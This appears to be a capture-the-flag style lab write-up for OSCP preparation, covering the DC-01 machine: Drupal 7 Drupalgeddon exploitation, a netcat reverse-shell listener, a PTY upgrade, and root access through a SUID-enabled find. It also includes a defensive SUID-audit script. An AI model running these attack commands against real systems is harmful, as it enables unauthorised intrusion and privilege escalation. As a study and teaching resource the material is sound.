Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

DC-01 Machine — Drupal Exploitation to SUID Privilege Escalation

Today's lab focused on exploiting a vulnerable Drupal 7 instance and escalating privileges using SUID misconfiguration.

This machine reinforced the importance of:

  • Service enumeration
  • Exploit verification
  • Reverse shell handling
  • SUID-based privilege escalation

🔎 Step 1: Initial Enumeration

Started with a full aggressive scan:

nmap -sCV -A --min-rate 1000 192.168.xx.xx

Explanation:

  • -sC → Default Nmap scripts
  • -sV → Service version detection (-sCV is shorthand for -sC -sV)
  • -A → Aggressive mode: OS detection, version detection, script scanning and traceroute
  • --min-rate 1000 → Send at least 1000 packets per second for faster scanning

Findings:

✔ Port 80 open
✔ Drupal CMS running

๐ŸŒ Step 2: Identifying Drupal Version

Accessed web application in browser.

Observed that the site was running Drupal 7.

Searched for known exploits:

searchsploit drupal 7

Identified a public exploit for Drupal 7 (Drupalgeddon vulnerability).


💥 Step 3: Exploit Verification

Downloaded exploit:

searchsploit -m <exploit_id>

(-m copies the exploit file from the local Exploit-DB mirror into the current directory.)

Modified target IP in exploit script and executed it.

The exploit successfully confirmed remote code execution.


๐Ÿš Step 4: Reverse Shell Access

Injected reverse shell payload into exploit.

Triggered exploit → Reverse shell received successfully.

On attacker machine:

nc -lnvp 1234

(-l listen, -n no DNS resolution, -v verbose, -p 1234 local port; the reverse shell payload must point at this port.)

Upgraded the raw netcat shell to an interactive PTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

๐Ÿ” Step 5: Privilege Escalation โ€” SUID Enumeration

Enumerated SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Explanation:

  • -perm -u=s → Match files with the SUID bit set (the leading - means "at least these bits")
  • -type f → Regular files only
  • 2>/dev/null → Suppress permission-denied errors from directories we cannot read

Discovered an unusual SUID bit (root-owned, not part of a standard install) on:

/usr/bin/find
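From the defender's side, the finding above is exactly what a SUID baseline check should catch. The script below is an added example (not from the original post or the DC-01 lab): it reads the output of the find command from Step 5 on stdin, compares every path against a hypothetical allowlist of SUID binaries expected on a stock Debian-style host, prints the unexpected ones, and emits the chmod that would remove the bit. The allowlist and the sample scan are constructed for illustration; replace them with the SUID inventory of your own golden image.

```shell
#!/bin/sh
# Added example: audit a SUID inventory against a baseline allowlist.
# Normal usage on a live host:
#   find / -perm -u=s -type f 2>/dev/null | sh suid_audit.sh
# The allowlist below is a hypothetical baseline, not an authoritative list.

SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/umount"

# audit_suid: read one path per line from stdin and print every path that
# is not in SUID_ALLOWLIST. Returns 1 if at least one unexpected SUID file
# was seen, 0 otherwise, so it can gate a CI or config-management run.
audit_suid() {
    local path found
    found=0
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        # -x whole-line match, -F fixed string, -- stops option parsing
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
            found=1
        fi
    done
    return "$found"
}

# remediation_for: for each path on stdin print the command that strips the
# SUID bit. It is printed, not executed, so an operator reviews it first.
remediation_for() {
    local path
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        printf "chmod u-s '%s'\n" "$path"
    done
}

# Constructed sample of a SUID scan from a host like the lab machine:
# three expected binaries plus the misconfigured find.
SAMPLE_SCAN="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/bin/mount"

# Demo run on the constructed sample (prints: chmod u-s '/usr/bin/find').
printf '%s\n' "$SAMPLE_SCAN" | audit_suid | remediation_for
```

The allowlist is compared with exact string matches rather than substrings so that a path such as /usr/bin/findutils-extra would not be silently accepted because it starts with an allowed name. Run the audit from a cron job or a configuration-management check and treat any non-zero exit as a finding to investigate, since a SUID bit on a general-purpose tool like find gives any local user a root shell.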

🚨 Step 6: Exploiting SUID find (GTFOBins Method)

Checked GTFOBins for find.

Used the following command:

find . -exec /bin/sh \; -quit


Why This Works:

Because /usr/bin/find is owned by root and has the SUID bit set, the kernel runs it with an effective UID of 0. The -exec action spawns /bin/sh as a child of that process, and the child inherits the elevated effective UID, so the resulting shell is root. -quit stops find after the first match so only one shell is spawned. Note that bash drops an elevated effective UID on startup by default, while dash (the usual /bin/sh on Debian-based systems) does not, which is why the shell is launched via /bin/sh.

👑 Result

✔ Web exploitation via Drupal
✔ Reverse shell obtained
✔ SUID misconfiguration identified
✔ Root shell successfully gained

🎥 Full Practical Demonstration

For a complete step-by-step video walkthrough, watch here: